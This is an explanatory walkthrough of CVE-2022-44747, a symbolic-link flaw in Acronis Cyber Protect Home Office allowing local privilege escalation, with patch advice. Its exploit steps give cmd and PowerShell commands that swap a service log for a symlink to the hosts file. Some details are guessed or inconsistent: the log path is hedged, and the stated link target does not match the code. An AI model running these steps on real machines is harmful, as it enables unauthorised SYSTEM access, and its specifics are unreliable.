In late 2022, a notable vulnerability was identified in Acronis Cyber Protect Home Office (previously known as Acronis True Image) for Windows systems. Catalogued as CVE-2022-44747, this security flaw concerns improper soft link (symbolic link) handling, resulting in potential local privilege escalation. Products before build 40107 are confirmed to be affected. In this detailed walkthrough, we’ll explain how this vulnerability works, give a simplified code example, link original references, and show the exploit process, all in plain language.
Acronis Cyber Protect Home Office (Windows): Versions before build 40107
If you use this software, it is highly recommended that you upgrade to the latest version immediately.
The Root Cause: Improper Symbolic Link Handling
Many security problems happen when programs running as high-privileged users (like SYSTEM) do not check carefully when they read from or write to files. In this case, the Acronis service failed to properly validate symbolic links (also called "soft links"), which are essentially shortcuts to other files.
If an attacker can trick the service into following a symbolic link, they can get the service to write data to a file or location of their choice, even one they would not usually be allowed to change. If that file is sensitive or controls user rights, this can lead to privilege escalation – where a normal user can gain administrator or SYSTEM access.
Attacker identifies a writable directory where the service stores its logs or temporary files.
2. Attacker creates a symbolic link inside this directory, pointing to a sensitive file (like a system service configuration or password file).
3. Acronis service, running as SYSTEM, writes to the symlink, altering the target file in a way that lets the attacker escalate privileges.
Let’s break that into practical steps using a hypothetical—but realistic—exploit chain.
1. Identify a Vulnerable Directory
Find a folder used by Acronis where all users can write, but the files written are processed by the service as SYSTEM. From public advisories, this might typically be a logging or temp directory:
C:\ProgramData\Acronis\Logs\
2. Delete and Replace a File with a Symlink
Suppose the service regularly creates or appends to a file such as C:\ProgramData\Acronis\Logs\service.log. The attacker deletes it and replaces it with a symlink to a sensitive target, for example, the Windows SYSTEM user's profile (for a proof of concept):
:: Requires mklink, which needs admin rights for NTFS object symlinks,
:: but hardlinks or junctions may be usable. For demonstration:
del "C:\ProgramData\Acronis\Logs\service.log"
mklink "C:\ProgramData\Acronis\Logs\service.log" "C:\Windows\System32\drivers\etc\hosts"
*Note: Actual symlink exploitation on Windows may require enabling developer mode or abusing directory junctions / hardlinks; methods may vary depending on system configuration.*
3. Wait for the Acronis Service to Write
When the Acronis service next writes to its log, it unknowingly writes to the file the attacker pointed the symlink at, say, the hosts file, or another sensitive target, possibly overwriting or injecting arbitrary content that could be used for further exploitation.
4. Escalate Privileges
With SYSTEM or admin privileges gained (for example, by overwriting a scheduled task or startup script), the attacker could run arbitrary code as SYSTEM, giving them full control over the machine.
Code Snippet: Example Symbolic Link Attack
Here’s a simplified PowerShell example. This code assumes the daily log is cleared or created at service startup.
# Step 1. Identify the vulnerable log file
$logFile = "C:\ProgramData\Acronis\Logs\service.log"
$targetFile = "C:\Windows\System32\drivers\etc\hosts" # Replace with actual target
# Step 2. Remove the original log (if possible)
Remove-Item $logFile -Force
# Step 3. Create a symlink to the sensitive target
# (Requires Developer Mode or appropriate privileges)
New-Item -ItemType SymbolicLink -Path $logFile -Target $targetFile
Now, when Acronis writes to service.log, the write occurs on hosts, which can be exploited for further attacks (e.g., redirecting DNS requests).
Exploit Notes
- Attack must be local: The attacker needs access to the system, even if only as a low-privileged user.
Update your Acronis Cyber Protect Home Office installation to build 40107 or newer.
- Restrict permissions on temporary and log file directories if updating is not immediately possible.
References
- Original NVD Entry for CVE-2022-44747
- Acronis Security Bulletin
- MITRE CVE Description
- Public Discussion
Conclusion
CVE-2022-44747 is a classic example of why robust file handling, especially when dealing with log files or other write targets, is so critical for Windows services running with elevated privileges. If you use Acronis Cyber Protect Home Office with a build lower than 40107, patch your system now to avoid an easy privilege escalation path for local attackers.
Always check software vendor security pages, and keep your systems updated!
> *This explanation was written in simple language for accessibility, with original content tailored for clear understanding based on public disclosures. Always check official advisories and test responsibly.*
Timeline
Published on: 11/07/2022 20:15:00 UTC
Last modified on: 11/08/2022 20:39:00 UTC